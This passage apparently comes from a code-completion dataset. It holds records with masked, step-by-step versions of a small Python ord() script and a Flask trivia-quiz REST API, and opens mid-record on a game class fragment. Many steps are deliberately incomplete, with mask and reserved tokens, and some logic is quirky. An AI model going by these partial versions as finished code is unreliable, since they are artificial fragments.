Rectangle:\n return self.pos.rect(Player.RADIUS)\n\n def ball_hit_test(self, ball: Ball) -> bool:\n return self.rectangle().hit(ball.pos)\n",
"step-ids": [
0,
8,
9,
14,
15
]
}
|
[
0,
8,
9,
14,
15
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(ord(s))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s = input()
print(ord(s))
<|reserved_special_token_1|>
import sys, string, math
s = input()
print(ord(s))
|
flexible
|
{
"blob_id": "ade300f2921ca860bbe92aa351df2c88238b7996",
"index": 6039,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(ord(s))\n",
"step-3": "<mask token>\ns = input()\nprint(ord(s))\n",
"step-4": "import sys, string, math\ns = input()\nprint(ord(s))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers',
'Content-Type, Authorization, true')
response.headers.add('Access-Control-Allow-Methods',
'GET, PATCH,PUT,POST, DELETE, OPTIONS')
return response
<|reserved_special_token_0|>
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
error = False
questions = []
total_questions = 0
if type(page) is not int:
abort(422)
if request.method == 'GET':
try:
categories = [category.type for category in Category.query.all()]
if categories is None:
abort(404)
query = Question.query.paginate(page, per_page=10)
total_questions += len(Question.query.all())
if query is None:
abort(404)
if len(query.items) == 0:
error = True
results = query.items
for question in results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': total_questions, 'categories':
categories})
else:
abort(405)
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
error = False
if request.method == 'DELETE':
if type(question_id) is not int:
abort(422)
try:
question = Question.query.get(question_id)
db.session.delete(question)
db.session.commit()
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
return jsonify({'success': True, 'method': 'Delete',
'question': question_id})
else:
abort(405)
@app.route('/questions', methods=['POST'])
def add_question():
error = False
if request.method == 'POST':
try:
new_question = Question(question=request.json['question'],
answer=request.json['answer'], category=request.json[
'category'], difficulty=request.json['difficulty'])
db.session.add(new_question)
db.session.commit()
except Exception:
error = True
db.session.rollback()
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
print('Added: {}'.format(new_question))
return jsonify({'success': True, 'question': request.json})
else:
abort(405)
<|reserved_special_token_0|>
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
error = False
if request.method == 'POST':
try:
data = request.json
if data['quiz_category']['id'] == 0:
query = Question.query.all()
else:
query = Question.query.filter_by(category=str(int(data[
'quiz_category']['id']) + 1)).all()
previous_questions = data['previous_questions']
index = random.randint(0, len(query) - 1)
potential_question = query[index]
selected = False
while selected is False:
if potential_question.id in previous_questions:
index = random.randint(0, len(query) - 1)
potential_question = query[index]
else:
selected = True
_question_ = potential_question
next_question = {'id': _question_.id, 'question': _question_.
question, 'answer': _question_.answer, 'category':
_question_.category, 'difficulty': _question_.difficulty}
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(500)
else:
return jsonify({'success': True, 'question': next_question})
else:
abort(405)
<|reserved_special_token_0|>
@app.errorhandler(405)
def method_not_allowed(error):
return jsonify({'success': False, 'error': 405, 'message':
'Method Not Allowed'}), 405
@app.errorhandler(422)
def unprocessable_entity(error):
return jsonify({'success': False, 'error': 422, 'message':
'Unprocessable Entity'}), 422
@app.errorhandler(500)
def internal_server_error(error):
return jsonify({'success': False, 'error': 500, 'message':
'Internal Server Error'}), 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers',
'Content-Type, Authorization, true')
response.headers.add('Access-Control-Allow-Methods',
'GET, PATCH,PUT,POST, DELETE, OPTIONS')
return response
@app.route('/categories', methods=['GET'])
def get_categories():
categories = [category.type for category in Category.query.all()]
return jsonify({'categories': categories, 'success': True})
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
error = False
questions = []
total_questions = 0
if type(page) is not int:
abort(422)
if request.method == 'GET':
try:
categories = [category.type for category in Category.query.all()]
if categories is None:
abort(404)
query = Question.query.paginate(page, per_page=10)
total_questions += len(Question.query.all())
if query is None:
abort(404)
if len(query.items) == 0:
error = True
results = query.items
for question in results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': total_questions, 'categories':
categories})
else:
abort(405)
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
error = False
if request.method == 'DELETE':
if type(question_id) is not int:
abort(422)
try:
question = Question.query.get(question_id)
db.session.delete(question)
db.session.commit()
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
return jsonify({'success': True, 'method': 'Delete',
'question': question_id})
else:
abort(405)
@app.route('/questions', methods=['POST'])
def add_question():
error = False
if request.method == 'POST':
try:
new_question = Question(question=request.json['question'],
answer=request.json['answer'], category=request.json[
'category'], difficulty=request.json['difficulty'])
db.session.add(new_question)
db.session.commit()
except Exception:
error = True
db.session.rollback()
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
print('Added: {}'.format(new_question))
return jsonify({'success': True, 'question': request.json})
else:
abort(405)
@app.route('/questions/search', methods=['POST'])
def search_questions():
error = False
if request.method == 'POST':
search_term = str(request.json['searchTerm'])
if type(search_term) is not str:
abort(422)
try:
query_results = Question.query.filter(Question.question.ilike(
'%{}%'.format(search_term))).all()
questions = []
categories = [category.type for category in Category.query.all()]
for question in query_results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': len(questions), 'current_category': ''})
else:
abort(405)
<|reserved_special_token_0|>
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
error = False
if request.method == 'POST':
try:
data = request.json
if data['quiz_category']['id'] == 0:
query = Question.query.all()
else:
query = Question.query.filter_by(category=str(int(data[
'quiz_category']['id']) + 1)).all()
previous_questions = data['previous_questions']
index = random.randint(0, len(query) - 1)
potential_question = query[index]
selected = False
while selected is False:
if potential_question.id in previous_questions:
index = random.randint(0, len(query) - 1)
potential_question = query[index]
else:
selected = True
_question_ = potential_question
next_question = {'id': _question_.id, 'question': _question_.
question, 'answer': _question_.answer, 'category':
_question_.category, 'difficulty': _question_.difficulty}
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(500)
else:
return jsonify({'success': True, 'question': next_question})
else:
abort(405)
<|reserved_special_token_0|>
@app.errorhandler(405)
def method_not_allowed(error):
return jsonify({'success': False, 'error': 405, 'message':
'Method Not Allowed'}), 405
@app.errorhandler(422)
def unprocessable_entity(error):
return jsonify({'success': False, 'error': 422, 'message':
'Unprocessable Entity'}), 422
@app.errorhandler(500)
def internal_server_error(error):
return jsonify({'success': False, 'error': 500, 'message':
'Internal Server Error'}), 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers',
'Content-Type, Authorization, true')
response.headers.add('Access-Control-Allow-Methods',
'GET, PATCH,PUT,POST, DELETE, OPTIONS')
return response
@app.route('/categories', methods=['GET'])
def get_categories():
categories = [category.type for category in Category.query.all()]
return jsonify({'categories': categories, 'success': True})
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
error = False
questions = []
total_questions = 0
if type(page) is not int:
abort(422)
if request.method == 'GET':
try:
categories = [category.type for category in Category.query.all()]
if categories is None:
abort(404)
query = Question.query.paginate(page, per_page=10)
total_questions += len(Question.query.all())
if query is None:
abort(404)
if len(query.items) == 0:
error = True
results = query.items
for question in results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': total_questions, 'categories':
categories})
else:
abort(405)
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
error = False
if request.method == 'DELETE':
if type(question_id) is not int:
abort(422)
try:
question = Question.query.get(question_id)
db.session.delete(question)
db.session.commit()
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
return jsonify({'success': True, 'method': 'Delete',
'question': question_id})
else:
abort(405)
@app.route('/questions', methods=['POST'])
def add_question():
error = False
if request.method == 'POST':
try:
new_question = Question(question=request.json['question'],
answer=request.json['answer'], category=request.json[
'category'], difficulty=request.json['difficulty'])
db.session.add(new_question)
db.session.commit()
except Exception:
error = True
db.session.rollback()
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
print('Added: {}'.format(new_question))
return jsonify({'success': True, 'question': request.json})
else:
abort(405)
@app.route('/questions/search', methods=['POST'])
def search_questions():
error = False
if request.method == 'POST':
search_term = str(request.json['searchTerm'])
if type(search_term) is not str:
abort(422)
try:
query_results = Question.query.filter(Question.question.ilike(
'%{}%'.format(search_term))).all()
questions = []
categories = [category.type for category in Category.query.all()]
for question in query_results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': len(questions), 'current_category': ''})
else:
abort(405)
<|reserved_special_token_0|>
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
error = False
if request.method == 'POST':
try:
data = request.json
if data['quiz_category']['id'] == 0:
query = Question.query.all()
else:
query = Question.query.filter_by(category=str(int(data[
'quiz_category']['id']) + 1)).all()
previous_questions = data['previous_questions']
index = random.randint(0, len(query) - 1)
potential_question = query[index]
selected = False
while selected is False:
if potential_question.id in previous_questions:
index = random.randint(0, len(query) - 1)
potential_question = query[index]
else:
selected = True
_question_ = potential_question
next_question = {'id': _question_.id, 'question': _question_.
question, 'answer': _question_.answer, 'category':
_question_.category, 'difficulty': _question_.difficulty}
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(500)
else:
return jsonify({'success': True, 'question': next_question})
else:
abort(405)
@app.errorhandler(400)
def bad_request(error):
return jsonify({'success': False, 'error': 400, 'message': 'Bad Request'}
), 400
@app.errorhandler(404)
def resource_not_found(error):
return jsonify({'success': False, 'error': 404, 'message':
'Resource Not Found'}), 404
@app.errorhandler(405)
def method_not_allowed(error):
return jsonify({'success': False, 'error': 405, 'message':
'Method Not Allowed'}), 405
@app.errorhandler(422)
def unprocessable_entity(error):
return jsonify({'success': False, 'error': 422, 'message':
'Unprocessable Entity'}), 422
@app.errorhandler(500)
def internal_server_error(error):
return jsonify({'success': False, 'error': 500, 'message':
'Internal Server Error'}), 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app.config.from_object('config')
db.init_app(app)
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers',
'Content-Type, Authorization, true')
response.headers.add('Access-Control-Allow-Methods',
'GET, PATCH,PUT,POST, DELETE, OPTIONS')
return response
@app.route('/categories', methods=['GET'])
def get_categories():
categories = [category.type for category in Category.query.all()]
return jsonify({'categories': categories, 'success': True})
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
error = False
questions = []
total_questions = 0
if type(page) is not int:
abort(422)
if request.method == 'GET':
try:
categories = [category.type for category in Category.query.all()]
if categories is None:
abort(404)
query = Question.query.paginate(page, per_page=10)
total_questions += len(Question.query.all())
if query is None:
abort(404)
if len(query.items) == 0:
error = True
results = query.items
for question in results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': total_questions, 'categories':
categories})
else:
abort(405)
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
error = False
if request.method == 'DELETE':
if type(question_id) is not int:
abort(422)
try:
question = Question.query.get(question_id)
db.session.delete(question)
db.session.commit()
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
return jsonify({'success': True, 'method': 'Delete',
'question': question_id})
else:
abort(405)
@app.route('/questions', methods=['POST'])
def add_question():
error = False
if request.method == 'POST':
try:
new_question = Question(question=request.json['question'],
answer=request.json['answer'], category=request.json[
'category'], difficulty=request.json['difficulty'])
db.session.add(new_question)
db.session.commit()
except Exception:
error = True
db.session.rollback()
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
print('Added: {}'.format(new_question))
return jsonify({'success': True, 'question': request.json})
else:
abort(405)
@app.route('/questions/search', methods=['POST'])
def search_questions():
error = False
if request.method == 'POST':
search_term = str(request.json['searchTerm'])
if type(search_term) is not str:
abort(422)
try:
query_results = Question.query.filter(Question.question.ilike(
'%{}%'.format(search_term))).all()
questions = []
categories = [category.type for category in Category.query.all()]
for question in query_results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': len(questions), 'current_category': ''})
else:
abort(405)
@app.route('/category/<int:category_id>/questions', methods=['GET'])
def get_questions_by_category(category_id):
error = False
if request.method == 'GET':
if type(category_id) is not int:
abort(422)
try:
query = Question.query.filter_by(category=str(category_id)).all()
questions = []
for question in query:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': len(questions), 'current_category': ''})
else:
abort(405)
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
error = False
if request.method == 'POST':
try:
data = request.json
if data['quiz_category']['id'] == 0:
query = Question.query.all()
else:
query = Question.query.filter_by(category=str(int(data[
'quiz_category']['id']) + 1)).all()
previous_questions = data['previous_questions']
index = random.randint(0, len(query) - 1)
potential_question = query[index]
selected = False
while selected is False:
if potential_question.id in previous_questions:
index = random.randint(0, len(query) - 1)
potential_question = query[index]
else:
selected = True
_question_ = potential_question
next_question = {'id': _question_.id, 'question': _question_.
question, 'answer': _question_.answer, 'category':
_question_.category, 'difficulty': _question_.difficulty}
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(500)
else:
return jsonify({'success': True, 'question': next_question})
else:
abort(405)
@app.errorhandler(400)
def bad_request(error):
return jsonify({'success': False, 'error': 400, 'message': 'Bad Request'}
), 400
@app.errorhandler(404)
def resource_not_found(error):
return jsonify({'success': False, 'error': 404, 'message':
'Resource Not Found'}), 404
@app.errorhandler(405)
def method_not_allowed(error):
return jsonify({'success': False, 'error': 405, 'message':
'Method Not Allowed'}), 405
@app.errorhandler(422)
def unprocessable_entity(error):
return jsonify({'success': False, 'error': 422, 'message':
'Unprocessable Entity'}), 422
@app.errorhandler(500)
def internal_server_error(error):
return jsonify({'success': False, 'error': 500, 'message':
'Internal Server Error'}), 500
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
import os
import sys
from flask import Flask, request, abort, flash, jsonify, Response
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from flask_migrate import Migrate
import random
import unittest
from models import db, Question, Category
# set the number of pages fpr pagination
QUESTIONS_PER_PAGE = 10
# create and configure the app
app = Flask(__name__)
app.config.from_object('config')
db.init_app(app)
migrate = Migrate(app, db)
# set up cors for the application
cors = CORS(app, resources={r'/': {'origins': '*'}})
# to set Access-Control-Allow Headers and Methods
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers',
'Content-Type, Authorization, true')
response.headers.add('Access-Control-Allow-Methods',
'GET, PATCH,PUT,POST, DELETE, OPTIONS')
return response
# endpoint to handle GET requests for all available categories
@app.route('/categories', methods=['GET'])
def get_categories():
categories = [category.type for category in Category.query.all()]
return jsonify({'categories': categories, 'success': True})
# endpoint to handle GET requests for questions with pagination
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
error = False
questions = []
total_questions = 0
# if question id is not an integer
if type(page) is not int:
# let them know their input is not processable
abort(422)
# ensure proper request method
if request.method == 'GET':
try:
# query for all categories
categories = [category.type for category in Category.query.all()]
if categories is None:
# let the user know that no resource was found
abort(404)
query = Question.query.paginate(page, per_page=10)
total_questions += len(Question.query.all())
if query is None:
# let the user know that no resource was found
abort(404)
if len(query.items) == 0:
# let the user know that no resource was found
error = True
results = query.items
# format data
for question in results:
_question_ = {
'id': question.id,
'question': question.question,
'answer': question.answer,
'category': question.category,
'difficulty': question.difficulty
}
questions.append(_question_)
except Exception:
# set error to true and log on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
# let the user know their request was not successful
abort(400)
else:
# if successful send back success response
return jsonify({
'success': True,
'questions': questions,
'total_questions': total_questions,
'categories': categories
})
else:
# send method not allowed error
abort(405)
# endpoint to delete a question from the database
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
error = False
# ensure proper request method
if request.method == 'DELETE':
# if question id is not an integer
if type(question_id) is not int:
# let them know their input is not processable
abort(422)
try:
# get user selected question from database
question = Question.query.get(question_id)
# stage question delete
db.session.delete(question)
# commit deletion to the database
db.session.commit()
except Exception:
# set error to true and log on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
# close database session
db.session.close()
if error:
# send bad request error
abort(400)
else:
# if no error send success object and log on server
return jsonify({
'success': True,
'method': 'Delete',
'question': question_id
})
else:
# send method not allowed error
abort(405)
# endpoint to add a question to the database
@app.route('/questions', methods=['POST'])
def add_question():
error = False
# ensure proper request method
if request.method == 'POST':
try:
# format data for database
new_question = Question(
question=request.json['question'],
answer=request.json['answer'],
category=request.json['category'],
difficulty=request.json['difficulty']
)
# stage data in database
db.session.add(new_question)
# commit data to database
db.session.commit()
except Exception:
# set error to true and log on the server
error = True
db.session.rollback()
print('Error: {}'.format(sys.exc_info()))
finally:
# close database session
db.session.close()
if error:
# send bad request error
abort(400)
else:
# if no error send success object and log on server
print('Added: {}'.format(new_question))
return jsonify({
'success': True,
'question': request.json
})
else:
# send method not allowed error
abort(405)
# endpoint to search for for questions in the database
@app.route('/questions/search', methods=['POST'])
def search_questions():
error = False
# ensure proper request method
if request.method == 'POST':
# set esrch term from user request
search_term = str(request.json['searchTerm'])
# if the user submits something other than a string of text block it
if type(search_term) is not str:
# let them know their input is not processable
abort(422)
try:
# query database using user provided search term
query_results = Question.query.filter(
Question.question.ilike('%{}%'.format(search_term))).all()
questions = []
# get categories from database
categories = [category.type for category in Category.query.all()]
# format response data
for question in query_results:
_question_ = {
'id': question.id,
'question': question.question,
'answer': question.answer,
'category': question.category,
'difficulty': question.difficulty
}
questions.append(_question_)
except Exception:
# set error to true and log on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
# send bad request error
abort(400)
else:
# if no error send success object
return jsonify({
'success': True,
'questions': questions,
'total_questions': len(questions),
'current_category': ''
})
else:
# send method not allowed error
abort(405)
# endpoint to get questions by a specific category
@app.route('/category/<int:category_id>/questions', methods=['GET'])
def get_questions_by_category(category_id):
error = False
# ensure proper request method
if request.method == 'GET':
# if category id is not an integer
if type(category_id) is not int:
# let them know their input is not processable
abort(422)
try:
# get questions by user selected category
query = Question.query.filter_by(category=str(category_id)).all()
questions = []
# format response data
for question in query:
_question_ = {
'id': question.id,
'question': question.question,
'answer': question.answer,
'category': question.category,
'difficulty': question.difficulty
}
questions.append(_question_)
except Exception:
# set error to true and log on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
# send bad request error
abort(400)
else:
# if no error send success object
return jsonify({
'success': True,
'questions': questions,
'total_questions': len(questions),
'current_category': ''
})
else:
# send method not allowed error
abort(405)
# endpoint to initiate quiz
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
error = False
# ensure proper request method
if request.method == 'POST':
try:
data = request.json
# get questions from any category
if data['quiz_category']['id'] == 0:
query = Question.query.all()
# get questions from user specified caetgory
else:
query = Question.query.filter_by(
category=str(int(data['quiz_category']['id'])+1)).all()
# randomly select new non previously selected question
previous_questions = data['previous_questions']
index = random.randint(0, len(query)-1)
potential_question = query[index]
selected = False
while selected is False:
if potential_question.id in previous_questions:
# reassign index if already used
index = random.randint(0, len(query)-1)
potential_question = query[index]
else:
selected = True
# set question
_question_ = potential_question
# format data
next_question = {
'id': _question_.id,
'question': _question_.question,
'answer': _question_.answer,
'category': _question_.category,
'difficulty': _question_.difficulty
}
except Exception:
# set error and log error on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
# send internal server error
abort(500)
else:
# if no error send success object
return jsonify({
'success': True,
'question': next_question
})
else:
# send method not allowed error
abort(405)
# handle bad request errors
@app.errorhandler(400)
def bad_request(error):
return jsonify({
"success": False,
"error": 400,
"message": "Bad Request"
}), 400
# handle resource not found errors
@app.errorhandler(404)
def resource_not_found(error):
return jsonify({
"success": False,
"error": 404,
"message": "Resource Not Found"
}), 404
# handle resource not found errors
@app.errorhandler(405)
def method_not_allowed(error):
return jsonify({
"success": False,
"error": 405,
"message": "Method Not Allowed"
}), 405
# handle unprocessable entity errors
@app.errorhandler(422)
def unprocessable_entity(error):
return jsonify({
"success": False,
"error": 422,
"message": "Unprocessable Entity"
}), 422
# handle internal server errors
@app.errorhandler(500)
def internal_server_error(error):
return jsonify({
"success": False,
"error": 500,
"message": "Internal Server Error"
}), 500
# Default port:
if __name__ == '__main__':
app.run()
|
flexible
|
{
"blob_id": "b84a2093a51e57c448ee7b4f5a89d69dfb14b1b6",
"index": 4876,
"step-1": "<mask token>\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n\n<mask token>\n\n\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n if type(page) is not int:\n abort(422)\n if request.method == 'GET':\n try:\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n abort(404)\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n abort(404)\n if len(query.items) == 0:\n error = True\n results = query.items\n for question in results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': total_questions, 'categories':\n categories})\n else:\n abort(405)\n\n\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n if request.method == 'DELETE':\n if type(question_id) is not int:\n abort(422)\n try:\n question = Question.query.get(question_id)\n db.session.delete(question)\n db.session.commit()\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'method': 'Delete',\n 'question': question_id})\n else:\n abort(405)\n\n\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n if request.method == 'POST':\n try:\n new_question = Question(question=request.json['question'],\n answer=request.json['answer'], category=request.json[\n 'category'], difficulty=request.json['difficulty'])\n db.session.add(new_question)\n db.session.commit()\n except Exception:\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n print('Added: {}'.format(new_question))\n return jsonify({'success': True, 'question': request.json})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n if request.method == 'POST':\n try:\n data = request.json\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n else:\n query = Question.query.filter_by(category=str(int(data[\n 'quiz_category']['id']) + 1)).all()\n previous_questions = data['previous_questions']\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n else:\n selected = True\n _question_ = potential_question\n next_question = {'id': _question_.id, 'question': _question_.\n question, 'answer': _question_.answer, 'category':\n _question_.category, 'difficulty': _question_.difficulty}\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(500)\n else:\n return jsonify({'success': True, 'question': next_question})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({'success': False, 'error': 405, 'message':\n 'Method Not Allowed'}), 405\n\n\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({'success': False, 'error': 422, 'message':\n 'Unprocessable Entity'}), 422\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return jsonify({'success': False, 'error': 500, 'message':\n 'Internal Server Error'}), 500\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n\n@app.route('/categories', methods=['GET'])\ndef get_categories():\n categories = [category.type for category in Category.query.all()]\n return jsonify({'categories': categories, 'success': True})\n\n\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n if type(page) is not int:\n abort(422)\n if request.method == 'GET':\n try:\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n abort(404)\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n abort(404)\n if len(query.items) == 0:\n error = True\n results = query.items\n for question in results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': total_questions, 'categories':\n categories})\n else:\n abort(405)\n\n\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n if request.method == 'DELETE':\n if type(question_id) is not int:\n abort(422)\n try:\n question = Question.query.get(question_id)\n db.session.delete(question)\n db.session.commit()\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'method': 'Delete',\n 'question': question_id})\n else:\n abort(405)\n\n\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n if request.method == 'POST':\n try:\n new_question = Question(question=request.json['question'],\n answer=request.json['answer'], category=request.json[\n 'category'], difficulty=request.json['difficulty'])\n db.session.add(new_question)\n db.session.commit()\n except Exception:\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n print('Added: {}'.format(new_question))\n return jsonify({'success': True, 'question': request.json})\n else:\n abort(405)\n\n\n@app.route('/questions/search', methods=['POST'])\ndef search_questions():\n error = False\n if request.method == 'POST':\n search_term = str(request.json['searchTerm'])\n if type(search_term) is not str:\n abort(422)\n try:\n query_results = Question.query.filter(Question.question.ilike(\n '%{}%'.format(search_term))).all()\n questions = []\n categories = [category.type for category in Category.query.all()]\n for question in query_results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': len(questions), 'current_category': ''})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n if request.method == 'POST':\n try:\n data = request.json\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n else:\n query = Question.query.filter_by(category=str(int(data[\n 'quiz_category']['id']) + 1)).all()\n previous_questions = data['previous_questions']\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n else:\n selected = True\n _question_ = potential_question\n next_question = {'id': _question_.id, 'question': _question_.\n question, 'answer': _question_.answer, 'category':\n _question_.category, 'difficulty': _question_.difficulty}\n except Exception:\n error = True\n print('Error: 